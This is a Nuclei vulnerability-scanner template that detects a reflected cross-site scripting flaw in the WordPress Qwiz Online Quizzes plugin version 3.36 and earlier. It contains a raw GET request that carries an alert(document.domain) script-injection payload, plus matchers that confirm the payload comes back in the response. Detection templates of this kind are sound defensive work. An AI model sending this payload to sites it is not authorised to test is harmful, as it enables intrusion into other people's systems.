nuclei-templates/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml

34 lines
1.4 KiB
YAML

id: wp-qwiz-online-xss
info:
name: Qwiz Online Quizzes And Flashcards <= 3.36 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues.
remediation: Fixed in version 3.37
reference:
- https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4
- https://packetstormsecurity.com/files/154403/
- https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/"
tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards
http:
- raw:
- |
GET /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "quizzes/flashcard") && contains(body, "</script><script>alert(document.domain)</script>")'
condition: and
# digest: 4b0a00483046022100e6f510c7b771311b867ae58be91f63875f99ced46fdd1a94c31fa064f240008a022100ccf2bd5e1654d62adc247f8aa962651de7ae99fc9b4589c92ba87ee795353b40:922c64590222798bb761d5b6d8e72950